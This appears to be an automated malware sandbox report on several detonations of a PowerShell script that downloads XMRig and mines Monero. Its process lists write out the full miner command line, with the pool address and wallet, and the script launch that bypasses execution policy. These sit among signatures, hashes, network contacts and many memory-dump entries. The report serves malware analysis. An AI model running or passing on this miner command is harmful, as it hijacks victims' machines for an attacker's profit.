memory/3368-93-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-94-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-95-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-96-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-97-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-98-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-99-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-100-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-101-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-102-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-103-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-104-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-105-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-106-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-107-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-108-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-109-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-110-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-111-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-112-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-113-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-114-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-115-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-116-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-117-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-118-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:24

Platform

win11-20240426-en

Max time kernel

1796s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/748-0-0x00007FFF0D8F3000-0x00007FFF0D8F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lf4cywjg.5bx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/748-9-0x00000219285F0000-0x0000021928612000-memory.dmp

memory/748-10-0x00007FFF0D8F0000-0x00007FFF0E3B2000-memory.dmp

memory/748-11-0x00007FFF0D8F0000-0x00007FFF0E3B2000-memory.dmp

memory/748-12-0x00007FFF0D8F0000-0x00007FFF0E3B2000-memory.dmp

memory/748-14-0x0000021928C10000-0x0000021928C22000-memory.dmp

memory/748-15-0x00000219288E0000-0x00000219288EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4480-46-0x0000017CEF920000-0x0000017CEF940000-memory.dmp

memory/4480-47-0x0000017CEF960000-0x0000017CEF980000-memory.dmp

memory/4480-48-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-49-0x0000017CEF980000-0x0000017CEF9A0000-memory.dmp

memory/4480-51-0x0000017CEF9A0000-0x0000017CEF9C0000-memory.dmp

memory/748-50-0x00007FFF0D8F0000-0x00007FFF0E3B2000-memory.dmp

memory/748-53-0x00007FFF0D8F3000-0x00007FFF0D8F5000-memory.dmp

memory/4480-52-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-54-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-55-0x0000017CEF980000-0x0000017CEF9A0000-memory.dmp

memory/4480-57-0x0000017CEF9A0000-0x0000017CEF9C0000-memory.dmp

memory/4480-56-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-58-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-59-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-60-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-61-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-62-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-63-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-64-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-65-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-66-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-67-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-68-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-69-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-70-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-71-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-72-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-73-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-74-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-75-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-76-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-77-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-78-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-79-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-80-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-81-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-82-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-83-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-84-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-85-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-86-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-87-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-88-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-89-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-90-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-91-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-92-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-93-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-94-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-95-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-96-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-97-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-98-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-99-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-100-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-101-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-102-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-103-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-104-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-105-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-106-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-107-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-108-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-109-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-110-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-111-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-112-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-113-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-114-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-115-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

memory/4480-116-0x00007FF638F60000-0x00007FF639B93000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:35

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1766s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.201.50.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4988-5-0x0000019CB0EB0000-0x0000019CB0ED2000-memory.dmp

memory/4988-8-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-9-0x0000019CB11C0000-0x0000019CB1236000-memory.dmp

memory/4988-18-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q3xu1ud4.1pj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-48-0x0000019CB1180000-0x0000019CB1192000-memory.dmp

memory/4988-61-0x0000019CB0F00000-0x0000019CB0F0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4444-90-0x000001BB83970000-0x000001BB83990000-memory.dmp

memory/4444-91-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4988-93-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4444-92-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4988-94-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4988-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-96-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4444-97-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-98-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-99-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-100-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-101-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-102-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-103-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-104-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-105-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-106-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-107-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-108-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-109-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-110-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-111-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-112-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-113-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-114-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-115-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-116-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-117-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-118-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-119-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-120-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-121-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-122-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-123-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-124-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-125-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-126-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-127-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-128-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-129-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-130-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-131-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-132-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-133-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-134-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-135-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-136-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-137-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-138-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-139-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-140-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-141-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-142-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-143-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-144-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-145-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-146-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-147-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-148-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-149-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-150-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-151-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-152-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-153-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-154-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-155-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-156-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

memory/4444-157-0x00007FF6D4CF0000-0x00007FF6D5923000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
SE 184.31.15.137:443 www.bing.com tcp
US 8.8.8.8:53 137.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
